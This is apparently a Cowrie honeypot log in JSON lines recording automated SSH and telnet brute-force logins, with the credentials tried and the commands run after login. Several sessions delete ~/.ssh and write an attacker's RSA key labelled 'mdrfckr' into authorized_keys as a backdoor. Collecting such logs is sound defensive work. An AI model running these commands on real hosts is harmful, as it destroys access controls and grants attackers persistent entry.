{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:43.243333Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer#1234","message":"login attempt [root/qwer#1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:57:44.218001Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:57:44.775022Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:57:44.775690Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:57:44.776544Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:45.021537Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:57:45.532074Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:57:45.532974Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:57:45.780545Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:45.781540Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33486,"dst_ip":"1.2.3.4","dst_port":22,"session":"de52a4fa9eca","protocol":"ssh","message":"New connection: 212.227.235.229:33486 (1.2.3.4:22) [session: de52a4fa9eca]","sensor":"my-vps","timestamp":"2025-08-26T12:57:46.014961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:46.015970Z","src_ip":"212.227.235.229","session":"de52a4fa9eca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:46.256006Z","src_ip":"212.227.235.229","session":"de52a4fa9eca"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:57:47.260139Z","src_ip":"212.227.235.229","session":"de52a4fa9eca"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:48.503291Z","src_ip":"212.227.235.229","session":"de52a4fa9eca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35402,"dst_ip":"1.2.3.4","dst_port":22,"session":"81e5eca4c88e","protocol":"ssh","message":"New connection: 212.227.235.229:35402 (1.2.3.4:22) [session: 81e5eca4c88e]","sensor":"my-vps","timestamp":"2025-08-26T12:57:48.746786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:57:48.747943Z","src_ip":"212.227.235.229","session":"81e5eca4c88e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:57:48.991462Z","src_ip":"212.227.235.229","session":"81e5eca4c88e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:57:50.007811Z","src_ip":"212.227.235.229","session":"81e5eca4c88e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:50.253042Z","src_ip":"212.227.235.229","session":"81e5eca4c88e"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:57:50.256453Z","src_ip":"212.227.235.229","session":"d7ed82525b57"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":46380,"dst_ip":"1.2.3.4","dst_port":22,"session":"1784da5cfbc8","protocol":"ssh","message":"New connection: 45.88.8.215:46380 (1.2.3.4:22) [session: 1784da5cfbc8]","sensor":"my-vps","timestamp":"2025-08-26T12:58:28.962338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:58:29.603008Z","src_ip":"45.88.8.215","session":"1784da5cfbc8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:58:29.603721Z","src_ip":"45.88.8.215","session":"1784da5cfbc8"}
{"eventid":"cowrie.login.success","username":"root","password":"Mithilesh@123","message":"login attempt [root/Mithilesh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:58:31.496120Z","src_ip":"45.88.8.215","session":"1784da5cfbc8"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:58:31.844090Z","src_ip":"45.88.8.215","session":"1784da5cfbc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47170,"dst_ip":"1.2.3.4","dst_port":22,"session":"3441b377d207","protocol":"ssh","message":"New connection: 212.227.235.229:47170 (1.2.3.4:22) [session: 3441b377d207]","sensor":"my-vps","timestamp":"2025-08-26T12:58:53.611907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:58:53.612898Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53406,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0cb5cd5aec9","protocol":"ssh","message":"New connection: 212.227.235.229:53406 (1.2.3.4:22) [session: a0cb5cd5aec9]","sensor":"my-vps","timestamp":"2025-08-26T12:58:55.743052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:58:55.744075Z","src_ip":"212.227.235.229","session":"a0cb5cd5aec9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:58:55.984921Z","src_ip":"212.227.235.229","session":"a0cb5cd5aec9"}
{"eventid":"cowrie.login.failed","username":"elias","password":"123","message":"login attempt [elias/123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:58:56.989109Z","src_ip":"212.227.235.229","session":"a0cb5cd5aec9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:58:57.047954Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:58:58.232056Z","src_ip":"212.227.235.229","session":"a0cb5cd5aec9"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer1234.","message":"login attempt [root/qwer1234.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:58:58.495959Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:58:59.036581Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:58:59.037273Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:58:59.038360Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:58:59.284116Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:58:59.833666Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:58:59.834416Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:59:00.080707Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:59:00.081752Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47180,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b350c59127e","protocol":"ssh","message":"New connection: 212.227.235.229:47180 (1.2.3.4:22) [session: 3b350c59127e]","sensor":"my-vps","timestamp":"2025-08-26T12:59:00.328013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:59:00.328723Z","src_ip":"212.227.235.229","session":"3b350c59127e"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":46890,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed30d4098481","protocol":"telnet","message":"New connection: 79.124.8.120:46890 (1.2.3.4:23) [session: ed30d4098481]","sensor":"my-vps","timestamp":"2025-08-26T12:59:02.850554Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:59:02.890231Z","src_ip":"79.124.8.120","session":"ed30d4098481"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:59:02.911788Z","src_ip":"79.124.8.120","session":"ed30d4098481"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48202,"dst_ip":"1.2.3.4","dst_port":22,"session":"e49e64293f26","protocol":"ssh","message":"New connection: 212.227.235.229:48202 (1.2.3.4:22) [session: e49e64293f26]","sensor":"my-vps","timestamp":"2025-08-26T12:59:06.343448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:59:06.344265Z","src_ip":"212.227.235.229","session":"e49e64293f26"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:59:06.599316Z","src_ip":"212.227.235.229","session":"e49e64293f26"}
